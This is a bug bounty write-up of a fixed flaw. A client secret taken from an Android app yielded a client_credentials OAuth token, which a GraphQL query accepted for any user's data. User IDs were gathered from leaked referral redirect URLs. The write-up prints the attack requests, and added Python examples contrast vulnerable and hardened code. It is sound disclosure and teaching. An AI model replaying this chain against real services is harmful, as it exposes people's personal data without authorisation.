Access to all users' data with OAuth client credentials

Published in Write-Ups ・April 19, 2021 ・ 1 min read

In the OAuth client credentials write-up, I described how to find such vulnerabilities. This is a real-world example of that attack.

One day I was poking around in a new bug bounty (BB) program and noticed what its authentication request looked like:

POST /v1/oauth/token HTTP/1.1
Host: api.production.target.com
Connection: close
Content-Type: application/json

{
  "grant_type":"password",
  "username":"[email protected]",
  "password":"hax0rPass",
  "client_id":"536a6cf18fd5f4661b6266d3ceac3f"
}

So I started looking everywhere for a client secret. Finally, in the Android application, I found a file, res/raw/src_config_prod.json, that contained another pair of OAuth credentials:

"Android": {
  "env": "production",
  "apiVersion": "v1",
  "authBaseUrl": "https://my.target.com",
  "clientId": "e547420203007f9a4d07d0b58426b9",
  "clientSecret": "6ba1dc015f2dd457b5720241d7b2a9783f"
},

I changed the request to this:

POST /v1/oauth/token HTTP/1.1
Host: api.production.target.com
Connection: close
Content-Type: application/json

{
  "grant_type":"client_credentials",
  "client_id": "e547420203007f9a4d07d0b58426b9",
  "client_secret": "6ba1dc015f2dd457b5720241d7b2a9783f"
}

And I got an access token.

There is a GraphQL API, and a regular user can fetch their own data with this request:

POST /graphql HTTP/1.1
Host: my.target.com
authorization: Bearer 8fkMOEXmyeMcGn7
accept: */*
content-type: application/json

{
  "operationName":"personQuery",
  "variables": {"id":"u-ipm582ajdn92"},
  "query":"query personQuery($id: ID) { ..."

So I immediately swapped the Bearer token for the client-credentials token and got the same response.
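The root cause here is that the GraphQL resolver accepted any valid access token, regardless of which grant produced it. A client_credentials token represents the application, not a person, so it has no subject and should never be honoured on a resolver that returns per-user data. The following is an added example, not code from the write-up or from the target: it models tokens as already-validated introspection results and puts a leaky resolver beside a hardened one. The claim names (grant_type, sub, scope), the users:read_all scope and all user records are constructed assumptions.

```python
"""
Added example (not from the original write-up): how a personQuery resolver
can refuse client_credentials tokens and enforce ownership.

Tokens are modelled as dicts a token-introspection endpoint might return,
because the write-up only shows opaque bearer tokens. The claim names and
the admin scope are assumptions, not values from the target.
"""
from dataclasses import dataclass, field
from typing import Optional

# Constructed user records (not real data).
USERS = {
    "u-ipm582ajdn92": {"id": "u-ipm582ajdn92", "email": "reporter@example.com"},
    "u-victim000001": {"id": "u-victim000001", "email": "victim@example.com"},
}


@dataclass(frozen=True)
class Token:
    """Claims an introspection endpoint might return (assumed shape)."""
    active: bool
    grant_type: str            # "password" (user) or "client_credentials" (app)
    sub: Optional[str] = None  # user ID for user tokens, None for client tokens
    scope: frozenset = field(default_factory=frozenset)


class Forbidden(Exception):
    pass


def person_query_vulnerable(token: Token, person_id: str) -> dict:
    """Mirrors the behaviour in the write-up: any active token may read any user."""
    if not token.active:
        raise Forbidden("invalid token")
    return USERS[person_id]


def person_query_hardened(token: Token, person_id: str) -> dict:
    """Reject application tokens for user-scoped data and enforce ownership."""
    if not token.active:
        raise Forbidden("invalid token")
    # A client_credentials token has no end user behind it, so it must not
    # be accepted on a resolver that returns per-user data.
    if token.grant_type == "client_credentials" or token.sub is None:
        raise Forbidden("user-scoped query requires a user token")
    # Ownership check: a user may only read their own record unless the
    # token carries an explicit admin scope (assumed scope name).
    if person_id != token.sub and "users:read_all" not in token.scope:
        raise Forbidden("cannot read another user's record")
    return USERS[person_id]


# Constructed tokens for the demonstration.
USER_TOKEN = Token(active=True, grant_type="password", sub="u-ipm582ajdn92")
CLIENT_TOKEN = Token(active=True, grant_type="client_credentials")


def demo() -> dict:
    """Run both resolvers against both tokens; map (resolver, token, target) -> allowed."""
    results = {}
    for name, resolver in (("vulnerable", person_query_vulnerable),
                           ("hardened", person_query_hardened)):
        for tname, tok in (("user", USER_TOKEN), ("client", CLIENT_TOKEN)):
            for target in USERS:
                try:
                    resolver(tok, target)
                    results[(name, tname, target)] = True
                except Forbidden:
                    results[(name, tname, target)] = False
    return results


if __name__ == "__main__":
    for key, allowed in sorted(demo().items()):
        print(key, "allowed" if allowed else "denied")
```

The vulnerable resolver lets the client token read every record, which is exactly the outcome the write-up describes; the hardened one denies the client token outright and limits a user token to its own subject. If the application genuinely needs a machine-to-machine path to user data, that should be a separately scoped token and a separate, audited resolver, not the same personQuery.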

But there was a problem: the user ID was not guessable ('u-ipm582ajdn92'). I tried to find features like messaging between users and googled for user IDs, but got nothing. So I carefully wrote down everything I had in my notes and decided to leave this target for a few days.

After that time, I remembered that the program has a referral feature, which is a likely place for user IDs to be exposed. And I was right.

My referral link looks like https://my.target.com/invite/QDQAAB, and it redirects to

https://my.target.com/app/public/invite?referral_token=XX&utm_campaign=referrer-u-ipm582ajdn92

The final URL contains my user ID in the utm_campaign parameter, and the referral code is short enough to brute-force. Even better than brute-forcing them, I googled for the invite codes and got more than 1000 results.
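The second half of the chain is an information leak: the invite redirect copies the referrer's internal user ID into a public, indexable URL. The example below is added here and is not the target's code; it builds the redirect URL two ways. The leaky form reproduces the pattern from the write-up; the fixed form keeps the referral_token to user mapping server-side and exposes only a keyed, non-reversible referrer tag to analytics. It also shows how to size new referral codes. The analytics key, the referral store and all IDs are constructed.

```python
"""
Added example (not from the write-up): building the post-redirect invite URL
without leaking the referrer's user ID, plus a check that detects the leak.
All codes, keys and user IDs are constructed for the demonstration.
"""
import hashlib
import hmac
import math
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

BASE = "https://my.target.com/app/public/invite"

# Server-side store: referral code -> referrer's user ID (constructed).
REFERRALS = {"QDQAAB": "u-ipm582ajdn92"}

# Assumed server-side secret for analytics tags; never shipped to clients.
ANALYTICS_KEY = secrets.token_bytes(32)


def invite_url_leaky(code: str) -> str:
    """Pattern from the write-up: the raw user ID ends up in utm_campaign."""
    referrer = REFERRALS[code]
    query = {"referral_token": code, "utm_campaign": f"referrer-{referrer}"}
    return BASE + "?" + urlencode(query)


def invite_url_fixed(code: str) -> str:
    """Attribution stays server-side; analytics gets a keyed, opaque tag."""
    referrer = REFERRALS[code]
    # HMAC with a server-only key: stable per referrer for campaign reporting,
    # but not reversible to the user ID without the key.
    tag = hmac.new(ANALYTICS_KEY, referrer.encode(), hashlib.sha256).hexdigest()[:16]
    query = {"referral_token": code, "utm_campaign": f"referrer-{tag}"}
    return BASE + "?" + urlencode(query)


def exposes_user_id(url: str) -> bool:
    """Detection check: does any query parameter carry a known user ID?"""
    params = parse_qs(urlsplit(url).query)
    return any(uid in value
               for uid in REFERRALS.values()
               for values in params.values()
               for value in values)


def code_entropy_bits(alphabet_size: int, length: int) -> float:
    """Bits of entropy in a code drawn uniformly from alphabet_size^length."""
    return length * math.log2(alphabet_size)


def new_referral_code(referrer: str) -> str:
    """Issue a referral code with ~96 bits of entropy and register it."""
    code = secrets.token_urlsafe(12)
    REFERRALS[code] = referrer
    return code


if __name__ == "__main__":
    print("leaky :", invite_url_leaky("QDQAAB"), exposes_user_id(invite_url_leaky("QDQAAB")))
    print("fixed :", invite_url_fixed("QDQAAB"), exposes_user_id(invite_url_fixed("QDQAAB")))
    print("6 x [A-Z] code entropy:", round(code_entropy_bits(26, 6), 1), "bits")
    print("new code entropy:", round(code_entropy_bits(64, 16), 1), "bits")
```

Two points worth taking from this: the user ID should never have been needed in the URL at all, because the referral_token already identifies the referrer server-side, and anything that reaches a public URL should be assumed to end up in search engines, as the write-up's own Google results show. The exposes_user_id check is the kind of assertion that belongs in a test for any redirect builder.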

Timeline
  • May 16, 2020 (Saturday!!!) - reported
  • May 16, 2020 (same day) - triaged and rewarded as High
  • May 21, 2020 - fixed
